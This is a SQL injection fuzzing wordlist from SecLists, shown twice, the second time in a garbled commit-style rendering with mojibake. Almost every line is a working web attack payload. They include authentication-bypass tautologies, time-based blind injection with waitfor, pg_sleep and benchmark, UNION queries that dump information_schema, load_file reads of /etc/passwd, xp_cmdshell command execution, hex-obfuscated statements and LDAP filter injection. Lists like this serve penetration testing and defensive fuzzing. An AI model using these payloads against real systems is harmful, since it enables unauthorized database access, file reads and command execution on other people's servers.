SecLists/Fuzzing/Generic_SQLi

)%20or%20('x'='x
%20or%201=1
; execute immediate 'sel' || 'ect us' || 'er'
benchmark(10000000,MD5(1))#
update
";waitfor delay '0:0:__TIME__'--
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"hi"") or (""a""=""a"
delete
like
" or sleep(__TIME__)#
pg_sleep(__TIME__)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
 or 0=0 #
insert
1) or sleep(__TIME__)#
) or ('a'='a
; exec xp_regread
*|
@var select @var as var into temp end --
1)) or benchmark(10000000,MD5(1))#
asc
(||6)
"a"" or 3=3--"
" or benchmark(10000000,MD5(1))#
# from wapiti
 or 0=0 --
1 waitfor delay '0:0:10'--
 or 'a'='a
hi or 1=1 --"
or a = a
 UNION ALL SELECT
) or sleep(__TIME__)='
)) or benchmark(10000000,MD5(1))#
hi' or 'a'='a
0
21 %
limit
 or 1=1
 or 2 > 1
")) or benchmark(10000000,MD5(1))#
PRINT
hi') or ('a'='a
 or 3=3
));waitfor delay '0:0:__TIME__'--
a' waitfor delay '0:0:10'--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
or%201=1
1 or sleep(__TIME__)#
));waitfor delay '0:0:__TIME__'--
or 1=1
 and 1 in (select var from temp)--
 or '7659'='7659
 or 'text' = n'text'
 --
 or 1=1 or ''='
declare @s varchar (200) select @s = 0x73656c6 ...
exec xp
; exec master..xp_cmdshell 'ping 172.10.1.255'--
3.10E+17
" or pg_sleep(__TIME__)--
x' AND email IS NULL; --
&
admin' or '
 or 'unusual' = 'unusual'
//
truncate
1) or benchmark(10000000,MD5(1))#
\x27UNION SELECT
declare @s varchar(200) select @s = 0x77616974 ...
tz_offset
sqlvuln
"));waitfor delay '0:0:__TIME__'--
||6
or%201=1 --
%2A%28%7C%28objectclass%3D%2A%29%29
or a=a
) union select * from information_schema.tables;
PRINT @@variable
or isNULL(1/0) /*
26 %
" or "a"="a
(sqlvuln)
x' AND members.email IS NULL; --
 or 1=1--
 and 1=( if((load_file(char(110,46,101,120,11 ...
0x770061006900740066006F0072002000640065006C00 ...
%20'sleep%2050'
as
1)) or pg_sleep(__TIME__)--
/**/or/**/1/**/=/**/1
 union all select @@version--
,@variable
(sqlattempt2)
 or (EXISTS)
t'exec master..xp_cmdshell 'nslookup www.googl ...
%20$(sleep%2050)
1 or benchmark(10000000,MD5(1))#
%20or%20''='
||UTL_HTTP.REQUEST
 or pg_sleep(__TIME__)--
hi' or 'x'='x';
") or sleep(__TIME__)="
 or 'whatever' in ('whatever')
; begin declare @var varchar(8000) set @var=' ...
 union select 1,load_file('/etc/passwd'),1,1,1;
0x77616974666F722064656C61792027303A303A313027 ...
exec(@s)
) or pg_sleep(__TIME__)--
 union select
 or sleep(__TIME__)#
 select * from information_schema.tables--
a' or 1=1--
a' or 'a' = 'a
declare @s varchar(22) select @s =
 or 2 between 1 and 3
 or a=a--
 or '1'='1
|
 or sleep(__TIME__)='
 or 1 --'
or 0=0 #"
having
a'
" or isNULL(1/0) /*
declare @s varchar (8000) select @s = 0x73656c ...
â or 1=1 --
char%4039%41%2b%40SELECT
order by
bfilename
 having 1=1--
) or benchmark(10000000,MD5(1))#
 or username like char(37);
;waitfor delay '0:0:__TIME__'--
" or 1=1--
x' AND userid IS NULL; --
*/*
 or 'text' > 't'
 (select top 1
 or benchmark(10000000,MD5(1))#
");waitfor delay '0:0:__TIME__'--
a' or 3=3--
 -- &password=
 group by userid having 1=1--
 or ''='
; exec master..xp_cmdshell
%20or%20x=x
select
")) or sleep(__TIME__)="
0x730065006c0065006300740020004000400076006500 ...
hi' or 1=1 --
") or pg_sleep(__TIME__)--
%20or%20'x'='x
 or 'something' = 'some'+'thing'
exec sp
29 %
(
Ã½ or 1=1 --
1 or pg_sleep(__TIME__)--
0 or 1=1
) or (a=a
uni/**/on sel/**/ect
replace
%27%20or%201=1
)) or pg_sleep(__TIME__)--
%7C
x' AND 1=(SELECT COUNT(*) FROM tabname); --
&apos;%20OR
; or '1'='1'
declare @q nvarchar (200) select @q = 0x770061 ...
1 or 1=1
; exec ('sel' + 'ect us' + 'er')
23 OR 1=1
/
anything' OR 'x'='x
declare @q nvarchar (4000) select @q =
or 0=0 --
desc
||'6
)
1)) or sleep(__TIME__)#
or 0=0 #
 select name from syscolumns where id = (sele ...
hi or a=a
*(|(mail=*))
password:*/=1--
 or 1=1--
distinct
);waitfor delay '0:0:__TIME__'--
to_timestamp_tz
;waitfor delay '0:0:__TIME__'--
") or benchmark(10000000,MD5(1))#
 UNION SELECT
%2A%28%7C%28mail%3D%2A%29%29
+sqlvuln
 or 1=1 /*
)) or sleep(__TIME__)='
or 1=1 or ""=
 or 1 in (select @@version)--
sqlvuln;
 union select * from users where login = char ...
x' or 1=1 or 'x'='y
28 %
â or 3=3 --
@variable
 or '1'='1'--
"a"" or 1=1--"
//*
%2A%7C
" or 0=0 --
")) or pg_sleep(__TIME__)--
?
 or 1/*
!
Create Generic_SQLi cant remember where this is from =/ 2014-07-23 03:42:58 -07:00			`)%20or%20('x'='x`
			`%20or%201=1`
			`; execute immediate 'sel' \|\| 'ect us' \|\| 'er'`
			`benchmark(10000000,MD5(1))#`
			`update`
			`";waitfor delay '0:0:__TIME__'--`
			`1) or pg_sleep(__TIME__)--`
			`\|\|(elt(-3+5,bin(15),ord(10),hex(char(45))))`
			`"hi"") or (""a""=""a"`
			`delete`
			`like`
			`" or sleep(__TIME__)#`
			`pg_sleep(__TIME__)--`
			`(\|(objectclass=))`
			`declare @q nvarchar (200) 0x730065006c00650063 ...`
			`or 0=0 #`
			`insert`
			`1) or sleep(__TIME__)#`
			`) or ('a'='a`
			`; exec xp_regread`
			`*\|`
			`@var select @var as var into temp end --`
			`1)) or benchmark(10000000,MD5(1))#`
			`asc`
			`(\|\|6)`
			`"a"" or 3=3--"`
			`" or benchmark(10000000,MD5(1))#`
			`# from wapiti`
			`or 0=0 --`
			`1 waitfor delay '0:0:10'--`
			`or 'a'='a`
			`hi or 1=1 --"`
			`or a = a`
			`UNION ALL SELECT`
			`) or sleep(__TIME__)='`
			`)) or benchmark(10000000,MD5(1))#`
			`hi' or 'a'='a`
			`0`
			`21 %`
			`limit`
			`or 1=1`
			`or 2 > 1`
			`")) or benchmark(10000000,MD5(1))#`
			`PRINT`
			`hi') or ('a'='a`
			`or 3=3`
			`));waitfor delay '0:0:__TIME__'--`
			`a' waitfor delay '0:0:10'--`
			`1;(load_file(char(47,101,116,99,47,112,97,115, ...`
			`or%201=1`
			`1 or sleep(__TIME__)#`
			`));waitfor delay '0:0:__TIME__'--`
			`or 1=1`
			`and 1 in (select var from temp)--`
			`or '7659'='7659`
			`or 'text' = n'text'`
			`--`
			`or 1=1 or ''='`
			`declare @s varchar (200) select @s = 0x73656c6 ...`
			`exec xp`
			`; exec master..xp_cmdshell 'ping 172.10.1.255'--`
			`3.10E+17`
			`" or pg_sleep(__TIME__)--`
			`x' AND email IS NULL; --`
			`&`
			`admin' or '`
			`or 'unusual' = 'unusual'`
			`//`
			`truncate`
			`1) or benchmark(10000000,MD5(1))#`
			`\x27UNION SELECT`
			`declare @s varchar(200) select @s = 0x77616974 ...`
			`tz_offset`
			`sqlvuln`
			`"));waitfor delay '0:0:__TIME__'--`
			`\|\|6`
			`or%201=1 --`
			`%2A%28%7C%28objectclass%3D%2A%29%29`
			`or a=a`
			`) union select * from information_schema.tables;`
			`PRINT @@variable`
			`or isNULL(1/0) /*`
			`26 %`
			`" or "a"="a`
			`(sqlvuln)`
			`x' AND members.email IS NULL; --`
			`or 1=1--`
			`and 1=( if((load_file(char(110,46,101,120,11 ...`
			`0x770061006900740066006F0072002000640065006C00 ...`
			`%20'sleep%2050'`
			`as`
			`1)) or pg_sleep(__TIME__)--`
			`//or//1//=//1`
			`union all select @@version--`
			`,@variable`
			`(sqlattempt2)`
			`or (EXISTS)`
			`t'exec master..xp_cmdshell 'nslookup www.googl ...`
			`%20$(sleep%2050)`
			`1 or benchmark(10000000,MD5(1))#`
			`%20or%20''='`
			`\|\|UTL_HTTP.REQUEST`
			`or pg_sleep(__TIME__)--`
			`hi' or 'x'='x';`
			`") or sleep(__TIME__)="`
			`or 'whatever' in ('whatever')`
			`; begin declare @var varchar(8000) set @var=' ...`
			`union select 1,load_file('/etc/passwd'),1,1,1;`
			`0x77616974666F722064656C61792027303A303A313027 ...`
			`exec(@s)`
			`) or pg_sleep(__TIME__)--`
			`union select`
			`or sleep(__TIME__)#`
			`select * from information_schema.tables--`
			`a' or 1=1--`
			`a' or 'a' = 'a`
			`declare @s varchar(22) select @s =`
			`or 2 between 1 and 3`
			`or a=a--`
			`or '1'='1`
			`\|`
			`or sleep(__TIME__)='`
			`or 1 --'`
			`or 0=0 #"`
			`having`
			`a'`
			`" or isNULL(1/0) /*`
			`declare @s varchar (8000) select @s = 0x73656c ...`
			`â or 1=1 --`
			`char%4039%41%2b%40SELECT`
			`order by`
			`bfilename`
			`having 1=1--`
			`) or benchmark(10000000,MD5(1))#`
			`or username like char(37);`
			`;waitfor delay '0:0:__TIME__'--`
			`" or 1=1--`
			`x' AND userid IS NULL; --`
			`/`
			`or 'text' > 't'`
			`(select top 1`
			`or benchmark(10000000,MD5(1))#`
			`");waitfor delay '0:0:__TIME__'--`
			`a' or 3=3--`
			`-- &password=`
			`group by userid having 1=1--`
			`or ''='`
			`; exec master..xp_cmdshell`
			`%20or%20x=x`
			`select`
			`")) or sleep(__TIME__)="`
			`0x730065006c0065006300740020004000400076006500 ...`
			`hi' or 1=1 --`
			`") or pg_sleep(__TIME__)--`
			`%20or%20'x'='x`
			`or 'something' = 'some'+'thing'`
			`exec sp`
			`29 %`
			`(`
			`Ã½ or 1=1 --`
			`1 or pg_sleep(__TIME__)--`
			`0 or 1=1`
			`) or (a=a`
			`uni//on sel//ect`
			`replace`
			`%27%20or%201=1`
			`)) or pg_sleep(__TIME__)--`
			`%7C`
			`x' AND 1=(SELECT COUNT(*) FROM tabname); --`
			`'%20OR`
			`; or '1'='1'`
			`declare @q nvarchar (200) select @q = 0x770061 ...`
			`1 or 1=1`
			`; exec ('sel' + 'ect us' + 'er')`
			`23 OR 1=1`
			`/`
			`anything' OR 'x'='x`
			`declare @q nvarchar (4000) select @q =`
			`or 0=0 --`
			`desc`
			`\|\|'6`
			`)`
			`1)) or sleep(__TIME__)#`
			`or 0=0 #`
			`select name from syscolumns where id = (sele ...`
			`hi or a=a`
			`(\|(mail=))`
			`password:*/=1--`
			`or 1=1--`
			`distinct`
			`);waitfor delay '0:0:__TIME__'--`
			`to_timestamp_tz`
			`;waitfor delay '0:0:__TIME__'--`
			`") or benchmark(10000000,MD5(1))#`
			`UNION SELECT`
			`%2A%28%7C%28mail%3D%2A%29%29`
			`+sqlvuln`
			`or 1=1 /*`
			`)) or sleep(__TIME__)='`
			`or 1=1 or ""=`
			`or 1 in (select @@version)--`
			`sqlvuln;`
			`union select * from users where login = char ...`
			`x' or 1=1 or 'x'='y`
			`28 %`
			`â or 3=3 --`
			`@variable`
			`or '1'='1'--`
			`"a"" or 1=1--"`
			`//*`
			`%2A%7C`
			`" or 0=0 --`
			`")) or pg_sleep(__TIME__)--`
			`?`
			`or 1/*`
			`!`